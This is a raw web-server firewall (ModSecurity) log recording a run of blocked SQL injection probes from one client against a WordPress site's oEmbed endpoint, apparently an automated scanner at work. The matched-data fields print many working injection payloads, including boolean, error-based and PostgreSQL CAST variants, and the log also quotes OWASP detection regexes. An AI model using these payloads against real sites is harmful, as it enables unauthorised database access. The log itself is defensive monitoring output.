[id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3311= found within ARGS:url: https://investigacionperu.com/contacto/') AND 3311=8797 AND ('ECjV'='ECjV"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fHxeJlWfH1pdny5W7AAAAME"] [Thu Aug 15 03:21:17.045958 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:56510] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/') AND 6748=6748 AND ('PcJT'='PcJT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fXxeJlWfH1pdny5W7QAAANE"] [Thu Aug 15 03:21:17.443204 2024] [:error] [pid 31336:tid 139653805958912] [client 141.98.81.52:56514] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5382= found within ARGS:url: https://investigacionperu.com/contacto/' AND 5382=5070 AND 'mtcA'='mtcA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fUPAyXqJhbW53WyPPQAAAFc"] [Thu Aug 15 03:21:17.793399 2024] [:error] [pid 31337:tid 139653923456768] [client 141.98.81.52:56516] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/' AND 6748=6748 AND 'IGOY'='IGOY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fewCyyCVFXh0DMS2VgAAAIk"] [Thu Aug 15 03:21:18.305819 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56518] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2554= found within ARGS:url: https://investigacionperu.com/contacto/%' AND 2554=8369 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fnxeJlWfH1pdny5W7gAAANc"] [Thu Aug 15 03:21:18.760148 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:56520] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/%' AND 6748=6748 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fuwCyyCVFXh0DMS2VwAAAIQ"] [Thu Aug 15 03:21:19.145611 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:56522] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2575= found within ARGS:url: https://investigacionperu.com/contacto/ AND 2575=5498-- jmwp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26f3xeJlWfH1pdny5W7wAAAMo"] [Thu Aug 15 03:21:19.507844 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:56524] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/ AND 6748=6748-- jDJz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26f3xeJlWfH1pdny5W8AAAAM4"] [Thu Aug 15 03:21:20.166645 2024] [:error] [pid 31337:tid 139654041286400] [client 141.98.81.52:56526] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gOwCyyCVFXh0DMS2WAAAAIM"] [Thu Aug 15 03:21:20.457933 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:56528] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gHxeJlWfH1pdny5W8QAAAMg"] [Thu Aug 15 03:21:21.222234 2024] [:error] [pid 31335:tid 139653889885952] [client 141.98.81.52:56530] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/) AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9598=9598"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gW0MD5oChETZltkVNAAAAA0"] [Thu Aug 15 03:21:21.646329 2024] [:error] [pid 31335:tid 139653847922432] [client 141.98.81.52:56532] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/ AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gW0MD5oChETZltkVNQAAABI"] [Thu Aug 15 03:21:22.011394 2024] [:error] [pid 31337:tid 139653864707840] [client 141.98.81.52:56534] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/') AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('YNFY'='YNFY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26guwCyyCVFXh0DMS2WQAAAJA"] [Thu Aug 15 03:21:22.399223 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:56536] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/' AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sxaU'='sxaU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gnxeJlWfH1pdny5W8gAAAMA"] [Thu Aug 15 03:21:22.769483 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:56538] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/%' AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26gnxeJlWfH1pdny5W8wAAAMk"] [Thu Aug 15 03:21:23.140988 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:56540] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: https://investigacionperu.com/contacto/ AND (SELECT 7234 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7234=7234,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- QUxr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26g3xeJlWfH1pdny5W9AAAAMU"] [Thu Aug 15 03:21:23.769691 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:56542] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/) AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND (5180=5180"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26g3xeJlWfH1pdny5W9QAAANY"] [Thu Aug 15 03:21:24.139848 2024] [:error] [pid 31337:tid 139653805958912] [client 141.98.81.52:56544] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hOwCyyCVFXh0DMS2WgAAAJc"] [Thu Aug 15 03:21:24.598653 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:56546] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/') AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND ('tDOz'='tDOz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hHxeJlWfH1pdny5W9gAAANg"] [Thu Aug 15 03:21:25.041038 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:56550] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/' AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND 'MPxL'='MPxL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hXxeJlWfH1pdny5W-AAAANQ"] [Thu Aug 15 03:21:25.478838 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56552] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/%' AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hXxeJlWfH1pdny5W-QAAAME"] [Thu Aug 15 03:21:25.857694 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:56554] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 5466=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC)-- OJXK"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hXxeJlWfH1pdny5W-gAAANE"] [Thu Aug 15 03:21:26.329348 2024] [:error] [pid 